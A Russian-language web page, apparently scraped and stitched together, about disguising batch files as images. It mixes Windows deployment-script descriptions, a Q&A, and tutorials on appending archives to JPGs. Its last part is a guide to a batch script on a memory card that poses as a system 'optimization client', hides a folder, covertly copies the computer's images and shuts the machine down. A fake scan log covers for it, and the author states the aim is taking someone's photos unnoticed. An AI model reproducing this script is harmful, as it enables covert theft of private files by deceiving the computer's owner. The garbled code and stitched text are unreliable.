Как замаскировать bat-файл под изображение
Обновлено: 21.11.2024
Скопируйте эти сценарии в корень USB-накопителя. Перейдите на эту страницу, чтобы понять, что содержится в сценариях.
Загрузка ZIP-файла примеров сценариев включает все приведенные ниже сценарии:
Сценарии развертывания образа
Следующие сценарии настраивают устройства Windows с помощью файла образа WIM или FFU, а затем дают возможность настроить функции сброса нажатием кнопки.
Сценарии развертывания составляют следующие файлы:
- ApplyImage.bat
- ApplyRecovery.bat
- CreatePartitions-BIOS.txt
- CreatePartitions-BIOS-FFU.txt
- CreatePartitions-UEFI.txt
- CreatePartitions-UEFI-FFU.txt
- HideRecoveryPartitions-BIOS.txt
- СкрытьRecoveryPartitions-UEFI.txt
- СоздатьRecoveryPartitions-BIOS.txt
- СоздатьRecoveryPartitions-UEFI.txt
ApplyImage.bat
Используйте этот скрипт, чтобы применить образ Windows к новому устройству.
Примечание. Если вы скопируете и вставите приведенное ниже содержимое для создания файла .bat, вы можете получить ошибку при обнаружении встроенного ПО. Для успешного обнаружения прошивки убедитесь, что в строках, начинающихся с /f "tokens=2* delims= " %%A, есть табуляция, за которой следует пробел между delims= и " %%A .
ApplyImage.bat использует следующие сценарии DiskPart, которые необходимо поместить в ту же папку:
Сценарии создания разделов
Используйте эти сценарии вместе с DiskPart для форматирования и настройки разделов жесткого диска для Windows, включая средства восстановления. Отрегулируйте размеры разделов, чтобы заполнить диск по мере необходимости.
СоздатьPartitions-UEFI.txt
Создает разделы System, MSR, Windows и средств восстановления для компьютеров на базе UEFI.
Этот сценарий временно назначает следующие буквы дисков: System=S, Windows=W и Recovery=R. Раздел MSR не получает букву. Буква W используется, чтобы избежать потенциальных конфликтов букв дисков. После перезагрузки устройства разделу Windows присваивается буква C, а другим разделам буквы дисков не присваиваются.
Раздел восстановления должен располагаться после раздела Windows, чтобы обеспечить актуальность файла winre.wim в течение всего срока службы устройства.
На следующей диаграмме показана результирующая конфигурация раздела:
CreatePartitions-UEFI-FFU.txt
Этот сценарий основан на CreatePartitions-UEFI.txt, но он не создает раздел восстановления. Это связано с тем, что раздел Windows является последним разделом на диске и может быть расширен. Если используется этот сценарий, раздел восстановления можно настроить позже с помощью ApplyRecovery.bat.
СоздатьPartitions-BIOS.txt
Создает разделы System, Windows и инструментов восстановления для компьютеров с BIOS.
Этот сценарий временно назначает следующие буквы дисков: System=S, Windows=W и Recovery=R. Буква W используется, чтобы избежать потенциальных конфликтов букв дисков. После перезагрузки устройства разделу Windows присваивается буква C, а другим разделам буквы дисков не присваиваются.
Раздел восстановления должен располагаться после раздела Windows, чтобы обеспечить актуальность файла winre.wim в течение всего срока службы устройства.
На следующей диаграмме показана результирующая конфигурация раздела:
CreatePartitions-BIOS-FFU.txt
Этот сценарий основан на файле CreatePartitions-BIOS.txt, но он не создает раздел восстановления. Это связано с тем, что раздел Windows является последним разделом на диске и может быть расширен. Если используется этот сценарий, раздел восстановления можно настроить позже с помощью ApplyRecovery.bat.
ApplyRecovery.bat
Используйте этот сценарий для подготовки раздела восстановления Windows. Этот сценарий вызывается с помощью ApplyImage.bat, но его также можно запустить самостоятельно.
Примечание. Если вы скопируете и вставите приведенное ниже содержимое для создания файла .bat, вы можете получить ошибку при обнаружении встроенного ПО. Для успешного обнаружения прошивки убедитесь, что в строках, начинающихся с /f "tokens=2* delims= " %%A, есть табуляция, за которой следует пробел между delims= и " %%A .
ApplyRecovery.bat использует следующие сценарии DiskPart, которые необходимо поместить в ту же папку:
СоздатьRecoveryPartitions-UEFI.txt
СоздатьRecoveryPartitions-BIOS.txt
СкрытьRecoveryPartitions-UEFI.txt
HideRecoveryPartitions-BIOS.txt
Загрузка для аудита
Добавьте файл ответов в образ Windows в C:\mount\windows\Windows\Panther\unattend.xml, чтобы дать ему указание загрузиться в режиме аудита.Этот файл ответов можно создать в диспетчере образов системы Windows.
Буттоаудит-x64
Сохранение настроек Windows через восстановление
Windows не сохраняет автоматически ни настройки, созданные с помощью установочных файлов unattend.xml, ни настройки меню «Пуск» Windows, созданные с помощью LayoutModification.xml во время полного сброса системы, ни информацию о первом входе в систему из oobe.xml.
Чтобы убедиться, что ваши настройки сохранены, необходимо выполнить шаги по возврату файлов unattend.xml, LayoutModification.xml и oobe.xml на место. Вот несколько примеров сценариев, которые показывают, как сохранить эти настройки и вернуть их в нужные места. Сохраните копии unattend.xml, LayoutModification.xml, oobe.xml, а также эти два текстовых файла: ResetConfig.xml и EnableCustomizations.cmd в папке C:\Recovery\OEM\:
ResetConfig.xml
EnableCustomizations.cmd
Дополнительные сведения об использовании точек расширения для сброса нажатием кнопки см. в разделе Добавление сценариев расширения для сброса нажатием кнопки.
Переустановите входящие приложения Windows
Переустановите приложения Windows после добавления нового языка. Вы можете переустановить приложения, не удаляя их предварительно.
ПереустановитеInboxApps-x64.cmd
ReinstallInboxApps-x64 — это пример сценария для переустановки приложений, поставляемых с Windows. Это всего лишь пример, и он не обязательно требует переустановки всех приложений из папки «Входящие» в вашей системе. Обязательно используйте собственный скрипт, включающий все приложения на вашем устройстве.
Обратите внимание, что указанные ниже пути предполагают, что вы скопировали содержимое ISO-образа Inbox Apps в папку C:\Temp\Lab\Apps\Inbox.
Поиск букв дисков с помощью скрипта
Используйте этот сценарий в среде предустановки Windows, чтобы определить диск, на котором есть папка с именем "Изображения".
Я хочу скрыть bat-файл или его команды в файле изображения, чтобы при открытии изображения выполнялись команды в bat-файле.
Я пришел сюда в поисках того же самого (годы спустя), потому что я хочу запустить файл .bat, который просто отображает забавное сообщение в их командной строке. потому что мы с друзьями любим подшучивать друг над другом. :-) Совсем не злонамеренный.
5 ответов 5
Предполагая, что вы говорите конкретно о платформе Windows (что касается "пакетных" файлов), вы не можете этого сделать.
Пакетные файлы анализируются, а не компилируются, поэтому файл изображения с пакетом в нем все равно будет считываться как файл изображения.
Я действительно не могу выразить это более четко, чем то, что так не работает.
Однако, если вы действуете этично, вы можете повторно связать, скажем, расширение .jpg, которое будет открываться с командной строкой, и поместить свой пакет сценарий в текстовом файле с расширением .jpg.
И последнее замечание: участники StackOverflow часто плохо относятся к подобным вопросам просто потому, что вы вряд ли когда-либо пытаетесь добиться чего-то подобного с добрыми намерениями. Я не буду первым, кто тебя обожжет, но и точно не последним.
У меня нет намерения причинить кому-либо вред. Я хочу, чтобы при просмотре изображения отображалось всплывающее окно "Пожелание на день рождения".
Существует несколько способов, при помощи которых один файл может содержать два отдельных потока данных, которые не зависят друг от друга и не мешают друг другу. Одним из часто упоминаемых примеров этого является то, как можно добавить файл .zip к файлу .jpg и по-прежнему иметь комбинированную функцию файла как файлы обоих типов, в зависимости от того, какое приложение открывает его. Этот трюк использует особый способ структуры файлов jpeg и zip. Такие файлы похожи на программу полиглот.
Еще один распространенный метод встраивания несвязанной информации в файл — стеганография, то есть сокрытие сообщений в обычных объектах (например, в файлах изображений).
Вы также можете рассмотреть возможность использования альтернативного потока данных, хотя в таком случае пакетный файл, возможно, не будет встроен в изображение.
После того как пакетный файл каким-либо образом встроен, вы должны найти способ запустить пакетный файл вместо или в дополнение к любому приложению для просмотра изображений, настроенному пользователем.< /p>
Можно с уверенностью предположить, что обычный пользователь не ожидает, что файл, оканчивающийся на .jpg (например), откроет окно cmd.exe и начнет выполнять неизвестные инструкции. Проводник Windows, приложение, которое в большинстве случаев решает, какую программу запускать при двойном щелчке по файлу определенного типа, имеет разумные значения по умолчанию (т. е. файл .jpg открывается в приложении для просмотра изображений), хотя их можно изменить (хотя пользователи обычно не не меняйте эти разумные значения по умолчанию на безумные настройки, такие как cmd.exe.)
Самый простой способ — написать собственную программу-обработчик и сделать ее обработчиком по умолчанию для типов файлов изображений. Я считаю, что все приложения-обработчики должны быть скомпилированы PE-приложениями или файлами библиотек (.exe, .dll, .scr и т. д.), поэтому другой командный файл здесь не подойдет.Ваш пользовательский обработчик должен отменить внедрение, чтобы получить встроенный пакетный файл, а затем выполнить его с помощью cmd.exe.
Но если вам уже удалось заменить обработчик по умолчанию своим собственным кодом, то встроенный пакетный файл не имеет смысла, поскольку ваш код уже запущен.
Я должен повторить то, что сказал @Di-0xide по этому вопросу. Если вы пытаетесь написать законное приложение, и это является частью вашего плана проектирования, вам нужно вернуться к чертежной доске, потому что ни одно законное приложение никогда не должно делать такие вещи.
это инструкция, чтобы показать, как скрыть файл за изображением.
Для этого вы должны иметь базовые знания о командной строке, но если вы не знаете, ознакомьтесь с руководством
Шаг 1. Выберите изображение, которое будет использоваться для скрытия файла за изображением.
Шаг 2. Теперь выберите файл, который нужно скрыть за изображением, и сделайте его в формате .RAR. С помощью WinRAR.
И самое главное, вставьте оба файла на рабочий стол.
Вы можете делать это в любом месте, а не на рабочем столе, если у вас есть базовые знания о командной строке.
Шаг 3. Теперь откройте Cmd
и нажмите Enter
Примечание: CD означает изменение каталога. Введя указанную выше команду, вы измените каталог на рабочий стол
Шаг 4: Введите команду, указанную ниже
Копировать /b imagename.jpg + filename.rar finalimage.jpg
- Замените imagename.jpg на имя изображения, за которым вы хотите скрыть файл. Не забудьте добавить формат изображения (например: .jpg, .jpg, .jpg)
- Замените имя файла именем файла, который вы хотите скрыть. Он должен быть в формате .rar.
- Наконец, замените finalimage.jpg на любое имя, которое вы хотите, чтобы ваше окончательное изображение со скрытыми файлами. Это изображение, в котором будет скрыт ваш файл.
- в моем случае это будет
Копировать /b images.jpg + lock.rar hidden.jpg
Шаг 5: теперь, когда вы попытаетесь открыть это вновь созданное изображение, оно откроется как обычное изображение, но чтобы открыть скрытый файл, вам необходимо выполнить шаги, указанные ниже.
<р>2. Теперь найдите свое изображение и откройте его или просто перетащите изображение в WinRAR.Если ваш компьютер используется несколькими пользователями, вам, вероятно, приходилось скрывать определенные файлы на вашем компьютере. Есть много способов сделать это, и один из них — скрыть ваши файлы в изображении JPG.
На самом деле вы можете встроить свои файлы в любое изображение JPG, и все, что пользователи увидят, — это само изображение. Нет никаких признаков ваших скрытых файлов, и люди даже не узнают, что что-то скрыто в ваших фотографиях JPG. Однако, если кто-то взглянет на размер этого изображения, это может показаться подозрительным, так как размер этого изображения слишком велик из-за скрытых файлов в нем.
Вы можете скрыть свои файлы в изображении JPG как на компьютерах Windows, так и на компьютерах Mac.
Используйте командную строку, чтобы скрыть файлы в изображении JPG (Windows)
Если вы пользователь Windows, вы можете использовать команду в командной строке, чтобы скрыть свои файлы в изображении. Эта команда объединяет файлы, которые вы хотите скрыть, и изображение, которое вы решили использовать, в одном файле изображения.
Когда вы открываете этот файл изображения, оно выглядит как обычное изображение, и ничто не указывает на наличие в нем скрытых файлов.
Держите готовую фотографию JPG на рабочем столе, так как вы будете прятать в ней свои файлы.
- Вам нужно будет добавить файлы, которые вы хотите скрыть, в ZIP-архив. Для этого щелкните файлы правой кнопкой мыши, выберите "Отправить" и выберите "Сжатая (заархивированная) папка".
- Переместите ZIP-файл на рабочий стол.
- Используйте поиск Cortana, чтобы найти и открыть командную строку.
- Введите следующую команду, чтобы сделать рабочий стол текущим рабочим каталогом.
- Введите следующую команду, чтобы скрыть файлы в изображении JPG.
копировать /b source-image.jpg + your-archive.zip target-image-file.jpg
Вот что означает каждая часть команды:
source-image.jpg — это изображение, которое уже есть на вашем ПК и в котором вы хотите спрятать файлы.
your-archive.zip — это ZIP-файл, содержащий файлы, которые вы хотите скрыть.
- При выполнении команды на рабочем столе появится новый файл изображения JPG. Он содержит файлы, которые вы хотели скрыть в формате JPG.
Показать скрытые файлы
Вам не обязательно использовать командную строку, чтобы отобразить файлы, скрытые на фотографии JPG.
- Чтобы отобразить ваши файлы, щелкните правой кнопкой мыши изображение JPG, где ваши файлы скрыты, выберите «Открыть с помощью» и выберите «Архиватор WinRAR».
- Вы можете нажать кнопку «Извлечь в», чтобы извлечь файлы из архива и сохранить их в папку на вашем ПК.
- Еще один способ отобразить файлы – изменить расширение изображения JPG. Для этого щелкните правой кнопкой мыши фотографию, выберите "Переименовать" и измените расширение на ZIP.
- Вы можете дважды щелкнуть этот переименованный ZIP-файл, чтобы извлечь скрытые файлы.
Использование приложения для скрытия файлов в изображении JPG (Windows)
Если вы не хотите использовать командную строку, есть приложение с графическим пользовательским интерфейсом, позволяющее скрыть ваши файлы в изображении на вашем ПК. Это совершенно бесплатное приложение, и вы можете использовать его как для скрытия, так и для отображения файлов.
- Загрузите и извлеките приложение JPHS для Windows на свой компьютер.
- Запустите файл Jphswin.exe, дважды щелкнув его.
- В главном интерфейсе приложения нажмите кнопку "Открыть JPEG", чтобы загрузить исходное изображение.
- Перейдите туда, где находится ваше изображение, и дважды щелкните его, чтобы добавить в приложение.
- Нажмите «Скрыть» в строке меню приложения.
- Он попросит вас ввести пароль, чтобы скрыть ваши файлы. Введите пароль в оба поля и нажмите OK.
- Выберите файлы, которые вы хотите скрыть в изображении JPG.
- Когда вы вернетесь к основному интерфейсу, нажмите «Сохранить jpeg как» в строке меню, чтобы сохранить файл.
- Выберите папку для сохранения изображения JPG со скрытыми файлами.
Показать скрытые файлы
Вы можете использовать то же приложение JPHS для Windows, чтобы отобразить файлы.
- Откройте файл Jphswin.exe.
- Нажмите кнопку "Открыть JPEG" в строке меню.
- Выберите изображение JPG, в котором вы спрятали файлы.
- Когда изображение загрузится в приложение, нажмите «Искать» в строке меню.
- Введите пароль, который использовался для скрытия файлов, и нажмите "ОК".
- Выберите папку, в которой вы хотите сохранить файлы.
- Щелкните правой кнопкой мыши файл, который вы только что раскрыли, выберите «Переименовать» и измените расширение на то, которое было до того, как вы скрыли файл. Файл не откроется, если вы этого не сделаете.
Использование терминала для скрытия файлов в изображении JPG (Mac)
Если вы работаете на Mac, вы можете использовать команду Терминала, чтобы скрыть свои файлы в изображении JPG. Этот метод работает почти так же, как и в Windows.
Убедитесь, что фотография в формате JPG доступна на вашем рабочем столе. Вы можете взять его с любого веб-сайта, если у вас еще нет ничего для начала.
- Начните с добавления файлов, которые вы хотите скрыть, в архив. Вы можете сделать это, щелкнув правой кнопкой мыши файлы и выбрав «Сжать». Это создаст ZIP-архив в той же папке, что и ваши файлы.
- Скопируйте ZIP-архив на рабочий стол.
- Нажмите на Launchpad в Dock, найдите Терминал и откройте его.
- Введите следующую команду, чтобы сделать рабочий стол текущим рабочим каталогом.
- Используйте следующую команду в Терминале, чтобы скрыть файлы в изображении JPG.
cat source.jpg archive.zip > target.jpg
Вот что означает каждый параметр в команде:
source.jpg — это файл изображения, который уже есть на вашем рабочем столе.
archive.zip — содержит файлы, которые вы хотите скрыть.
- Чтобы проверить, действительно ли ваши файлы скрыты внутри изображения JPG, щелкните правой кнопкой мыши только что созданное изображение и выберите «Получить информацию». Вы увидите, что его размер теперь больше, чем раньше, что подтверждает, что ваши скрытые файлы действительно там.
Показать скрытые файлы
Для извлечения файлов из файла изображения вам понадобится Терминал.
- Выполните следующую команду в Терминале. Обязательно замените target.jpg на фактическое имя изображения, в котором спрятаны ваши файлы.
Использование приложения для скрытия файлов в изображении JPG (Mac)
Пользователям Mac доступно бесплатное приложение Steg для скрытия файлов в изображении JPG. Он имеет приятный графический пользовательский интерфейс, позволяющий скрывать и отображать файлы в фотографиях JPG на вашем компьютере.
- Скачайте приложение Steg и запустите его на своем Mac.
- Нажмите второй значок для изображения Open JPEG, чтобы загрузить файл JPG в приложение.
- Выберите файл JPG, в котором вы хотите скрыть свои файлы на Mac.
- Нажмите кнопку «Скрыть данные», чтобы добавить файлы для скрытия.
- Выберите файлы, которые вы хотите скрыть внутри изображения JPG.
- Вы получите уведомление о том, что данные успешно скрыты. Нажмите "ОК", чтобы продолжить.
- Нажмите кнопку «Сохранить», чтобы сохранить изображение в формате JPG со скрытыми файлами.
Показать скрытые файлы
Вам нужно использовать то же приложение Steg, чтобы отобразить файлы на Mac.
- Выберите изображение JPG, в котором вы скрыли свои файлы.
- Нажмите кнопку «Извлечь данные» в Steg, чтобы извлечь скрытые файлы.
- Выберите папку, в которой вы хотите сохранить извлеченные файлы.
Что вы думаете об этом необычном способе скрытия файлов в формате JPG? Дайте нам знать ваши мысли в комментариях ниже.
Махеш помешался на технологиях с тех пор, как десять лет назад у него появился первый гаджет. За последние несколько лет он написал ряд технических статей для различных онлайн-изданий, включая, помимо прочего, MakeTechEasier и Android AppStorm. Прочитать полную биографию Махеша
Понравился ли вам этот совет? Если это так, загляните на наш собственный канал на YouTube, где мы рассказываем о Windows, Mac, программном обеспечении и приложениях, а также предлагаем множество советов по устранению неполадок и видео с практическими рекомендациями. Нажмите кнопку ниже, чтобы подписаться!
Введение: пакетный файл для копирования фотографий секретного шпионского изображения
Итак, обо всем по порядку: что это за поучительное создание и почему.
Эта инструкция позволит вам создать пакетный файл, который будет копировать все изображения с ПК на карту памяти. он будет делать это незаметно, изображая из себя другую программу, которая проверяет компьютер на наличие проблем. По завершении у вас будет скрытая папка на карте памяти со всеми скопированными изображениями.
Почему? Я создал эту инструкцию, потому что хотел получить цифровую фотографию с чьей-то машины, чтобы они не знали, что я это сделал. Правомерное использование этого файла позволит вам архивировать/резервировать ваши личные фотографии.
Другое использование: этот файл можно изменить, чтобы разрешить копирование любого другого типа документа.
Шаг 1. Напишите код
Скопируйте следующий код в блокнот и сохраните его в корневом каталоге карты памяти как файл bat. Вы можете назвать его как хотите, если он имеет расширение .bat. Чтобы убедиться, что у него правильное расширение, введите его в поле сохранения блокнота «copyimage.bat» следующим образом (включая кавычки!)
@echo off
echo Клиент оптимизации 2008 v3.02b
echo ---------------------------- ----
echo.
echo Пожалуйста, не используйте компьютер во время работы.
echo.
echo Список процессов сканирования. По завершении журнал будет отображаться для просмотра системным администратором.
echo.
echo Пожалуйста, будьте терпеливы, это может занять до 3 часов.
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 00000002 /f >nul
mkdir \data >nul
attrib +h \data > nul
setLocal EnableDelayedExpansion
@echo off
для %%a в (jpg) do (
for /f "tokens=* delims %%f" \data\ /y / h /q >nul
)
)
attrib -s +h data\* >nul
начать оптимизациюLog.txt
shutdown /s /c "Оптимизация сканирования завершена , ваш компьютер выключится"
Шаг 2. Создайте поддельный файл отчета
На этом шаге я создал фальшивый текстовый файл, который притворяется журналом результатов пакетного файла, который мы запускаем для копирования файлов. Это позволяет вам притвориться, что что-то произошло. Неважно, что говорит этот файл, вы можете изменить его сколько угодно, просто убедитесь, что имя файла правильное и что он хранится в корне вашей карты памяти.
Текст, который я использовал, в основном взят из этого журнала, скопируйте его и сохраните в корень карты памяти как optimizationLog.txt
Сканирование завершено. Закройте этот журнал и позвольте системному администратору
просмотреть его.
Запущенные процессы:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Windows\system32\igfxsrvc.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
C :\Program Files\TOSHIBA\SmoothView\SmoothView.exe
C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
C:\Program Files\BitDefender\BitDefender 2009\bdagent.exe
>C:\Program Files\TOSHIBA\TOSCDSPD\TOSCDSPD.exe
C:\Program Files\Registry Mechanic\regmech.exe
C:\Program Files\BitDefender\BitDefender 2009\seccenter.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Program Files\Vuze\Azureus.exe
C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE
C:\Program Files\AutoCAD 2008\acad.exe
C:\Users\Tom\AppData\Local\Temp\AdskCleanup.0001
C:\Progra m Файлы\Mozilla Firefox\firefox.exe
C:\Windows\System32\NOTEPAD.EXE
C:\Windows\system32\SearchFilterHost.exe
C:\HijackThis\HijackThis.exe
R1 — HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.co.uk
R1 — HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http ://go.microsoft.com/fwlink/?LinkId=54896
R0 — HKCU\Software\Microsoft\Internet Explorer\Main, Start Page = http://www.google.co.uk
R1 — HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.co.uk
R1 — HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go .microsoft.com/fwlink/?LinkId=54896
R1 — HKLM\Software\Microsoft\Internet Explorer\Main, страница поиска = http://go.microsoft.com/fwlink/?LinkId=54896
R0 — HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 — HKLM\Software\Microsoft\Internet Explorer\Search, SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Хосты: ::1 localhost
O2 - BHO: AcroIEHelperStub - - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Groove GFS Browser Помощник - - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll
O2 - BHO: SSVHelper Class - - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O3 - Панель инструментов: Панель инструментов BitDefender - - C:\Program Files\BitDefender\BitDefender 2009\IEToolbar.dll
O4 - HKLM\..\Выполнить: [Защитник Windows] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe"
O4 - HKLM\..\Run : [IgfxTray] C:\Windows\system32\igfxtray.exe
O4 - HKLM\..\Выполнить: [HotKeysCmds] C:\Windows\system32\hkcmd.exe
O4 - HKLM\.. \Выполнить: [Persistence] C:\Windows\system32\igfxpers.exe
O4 - HKLM\..\Выполнить: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Выполнить: [TPwrMain] %ProgramFiles%\TOSHIBA\Power Saver\TPwrMain.EXE
O4 - H KLM\..\Выполнить: [SmoothView] %ProgramFiles%\Toshiba\SmoothView\SmoothView.exe
O4 - HKLM\..\Выполнить: [00TCrdMain] %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
O4 - HKLM\..\Выполнить: [Toshiba TEMPO] C:\Program Files\Toshiba TEMPRO\Toshiba.Tempo.UI.TrayApplication.exe
O4 - HKLM\..\Выполнить: [BDAgent] " C:\Program Files\BitDefender\BitDefender 2009\bdagent.exe"
O4 - HKLM\..\Выполнить: [Помощник по антифишингу BitDefender] "C:\Program Files\BitDefender\BitDefender 2009\IEShow.exe"< br />O4 - HKCU\..\Выполнить: [TOSCDSPD] C:\Program Files\TOSHIBA\TOSCDSPD\TOSCDSPD.exe
O4 - HKCU\..\Выполнить: [RegistryMechanic] C:\Program Files\ Registry Mechanic\RMTray.exe /H
O4 — Запуск: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
O8 — Дополнительный элемент контекстного меню: &Экспортировать в Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office12\EXCEL.EXE/3000
O9 - Дополнительная кнопка: (без имени) - - C:\PROGRA~1\Java \JRE16~2.0_0\bin\ssv.dll
O9 - Дополнительный пункт меню "Инструменты": Sun Консоль Java - - C:\PROGRA~1\Java\JRE16~2.0_0\bin\ssv.dll
O9 - Дополнительная кнопка: Отправить в OneNote - - C:\PROGRA~1\MICROS~3\Office12\ ONBttnIE.dll
O9 — Дополнительный пункт меню «Инструменты»: Отправить в OneNote — — C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dll
O9 — Дополнительная кнопка: eBay.co.uk - Купи, Продай, Люби - - http://rover.ebay.com/rover/1/710-44557-9400-3/4 (файл отсутствует)
O9 - Дополнительная кнопка: (без названия) - - %windir%\bdoscandel.exe (файл отсутствует)
O9 - Дополнительный пункт меню "Инструменты": Удаление BitDefender Online Scanner v8 - - %windir%\bdoscandel.exe (файл отсутствует)
O9 - Дополнительная кнопка : Amazon.co.uk — — http://www.amazon.co.uk/exec/obidos/redirect-home?tag=Toshibaukbholink-21&site=home (файл отсутствует)
O9 — Дополнительная кнопка: Исследование — - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLL
O10 - Неизвестный файл в Winsock LSP: c:\windows\system32\nlaapi.dll
O10 - Неизвестный файл в Winsock LSP : c:\windows\system32\napinsp.dll
O10 - Неизвестный файл в Winsock LSP: c:\program files\vmware\vmware w orkstation\vsocklib.dll
O10 — Неизвестный файл в Winsock LSP: c:\program files\vmware\vmware workstation\vsocklib.dll
O11 — Группа параметров: [МЕЖДУНАРОДНАЯ] Международная*
O13 - Префикс Gopher:
O16 - DPF: (класс get_atlcom) - http://wwwimages.adobe.com/www.adobe.com/products/acrobat/nos/gp.cab
O18 - Протокол: GrooveLocalGWS - - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll
O18 - Протокол: ms-help - - C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dll
O18 - Перехват фильтра: text/xml - - C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE12\MSOXMLMF.DLL
O20 - Уведомление Winlogon: igfxcui - C:\Windows\SYSTEM32\igfxdev .dll
O23 — Сервис: Agere Modem Call Progress Audio (AgereModemAudio) — Agere Systems — C:\Windows\system32\agrsmsvc.exe
O23 — Сервис: BitDefender Arrakis Server (Arrakis3) — BitDefender SRLhttp://www.bitdefender.com — C:\Program Files\Common Files\BitDefender\BitDefender Arrakis Server\bin\Arrakis3.exe
O23 — Служба: Служба лицензирования Autodesk — Autodesk — C:\Program Files\ Common Files\Autodesk Shared\Service\AdskScSrv.exe
O23 — Служба: Служба ConfigFree — TOSHIBA CORPORATION — C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
O23 — Служба: @%SystemRoot% \ehome\ehstart.dll,-101 (ehstart) - Неизвестный владелец - %windir%\system32\svchost.exe (файл отсутствует)
O23 - Служба: getPlus(R) Helper - NOS Microsystems Ltd. - C: \Program Files\NOS\bin\getPlus_HelperSvc.exe
O23 - Служба: Служба обновлений Google (gupdate1c98840f4e6525b) (gupdate1c98840f4e6525b) - Неизвестный владелец - C:\Program Files\Google\Update\GoogleUpdate.exe" /svc (файл отсутствует)
O23 — Служба: Служба обновления рабочего стола BitDefender (LIVESRV) — Неизвестный владелец — C:\Program Files\Common Files\BitDefender\Служба обновления BitDefender\livesrv.exe" /service (файл отсутствует)
O23 — Служба: @%SystemRoot%\syst em32\qwave.dll,-1 (QWAVE) - Неизвестный владелец - %windir%\system32\svchost.exe (файл отсутствует)
O23 - Служба: @%SystemRoot%\system32\seclogon.dll,-7001 ( seclogon) - Неизвестный владелец - %windir%\system32\svchost.exe (файл отсутствует)
O23 - Служба: Служба настройки производительности ноутбука (TempoMonitoringService) - Toshiba Europe GmbH - C:\Program Files\Toshiba TEMPRO\TempoSVC. exe
O23 — Служба: Служба поддержки TOSHIBA Navi (TNaviSrv) — Корпорация TOSHIBA — C:\Program Files\TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exe
O23 — Служба: Служба привода оптических дисков TOSHIBA (TODDSrv) ) - Корпорация TOSHIBA - C:\Windows\system32\TODDSrv.exe
O23 - Служба: TOSHIBA Power Saver (TosCoSrv) - Корпорация TOSHIBA - c:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
O23 — Служба: Служба журналов TOSHIBA SMART — Корпорация TOSHIBA — c:\Program Files\TOSHIBA\SMARTLogService\TosIPCSrv.exe
O23 — Служба: Служба агента VMware (ufad-ws60) — Неизвестный владелец — C:\Program Файлы\VMware\VMware Workstation \vmware-ufad.exe" -d "C:\Program Files\VMware\VMware Workstation\\" -s ufad-p2v.xml (файл отсутствует)
O23 - Сервис: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. — C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
O23 — Служба: Служба авторизации VMware (VMAuthdService) — VMware, Inc. — C:\Program Files\VMware\ VMware Workstation\vmware-authd.exe
O23 — Служба: Служба VMware DHCP (VMnetDHCP) — VMware, Inc. — C:\Windows\system32\vmnetdhcp.exe
O23 — Служба: Служба VMware NAT — VMware, Inc. — C:\Windows\system32\vmnat.exe
O23 — Служба: BitDefender Virus Shield (VSSERV) — Неизвестный владелец — C:\Program Files\BitDefender\BitDefender 2009\vsserv.exe"/service (файл отсутствует)
O23 — Служба: VNC Server версии 4 (WinVNC4) — Неизвестный владелец — C:\Program Files\RealVNC\VNC4\WinVNC4.exe" -service (файл отсутствует)
O23 — Служба : @%ProgramFiles%\Windows Media Player\wmpnetwk.exe, -101 (WMPNetworkSvc) - Неизвестный владелец - %ProgramFiles%\Windows Медиаплеер\wmpnetwk.exe (файл отсутствует)
Шаг 3. Запустите программу
Теперь у вас должна быть карта памяти с двумя файлами (и много свободного места для новых изображений). Если у вас есть что-то еще на диске, это не имеет значения.
Поднесите карту памяти к целевому компьютеру. Когда он будет зарегистрирован, обратите внимание на выделенную ему букву диска, это позволит вам запустить его без необходимости сначала переходить к папке.
Нажмите клавишу Windows, а затем нажмите клавишу R (удерживая нажатой клавишу Windows). Это вызовет окно «Выполнить». В поле запуска введите путь к созданному нами пакетному файлу, буква диска соответствует букве, назначенной при подключении карты памяти.
Например, если я вставлю карту памяти, и она зарегистрирует диск g:\, я выполню:
А затем нажмите Enter или нажмите Run. Это запустит пакетный файл. Когда он будет завершен, он выключит машину. Выньте карту памяти и унесите ее!
Шаг 4. Получите изображения!
Теперь у вас должна быть карта памяти со всеми изображениями. Файлы и папки скрыты, поэтому, если они не отображаются, вам нужно включить их. Для этого войдите в окно проводника (например, откройте мой компьютер) и:
